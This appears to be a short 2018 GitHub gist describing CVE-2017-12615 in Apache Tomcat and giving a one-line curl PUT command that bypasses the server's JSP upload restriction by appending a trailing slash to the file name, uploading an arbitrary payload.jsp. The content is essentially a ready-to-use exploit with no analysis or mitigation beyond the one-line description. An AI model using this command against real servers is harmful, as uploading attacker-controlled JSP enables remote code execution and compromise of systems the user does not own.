Skip to content

Instantly share code, notes, and snippets.

@cmaggiulli
Created July 15, 2018 19:00
Show Gist options
  • Save cmaggiulli/ae7982f5c4f07126372b12f2e6da7df1 to your computer and use it in GitHub Desktop.
Save cmaggiulli/ae7982f5c4f07126372b12f2e6da7df1 to your computer and use it in GitHub Desktop.
CVE-2017-12615 bypass the jsp file type restriction on put requests for affected tomcat servers by appending a forward slash to the end of the fie name.
curl -X PUT http://url:port/payload.jsp/ -d @- < payload.jsp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment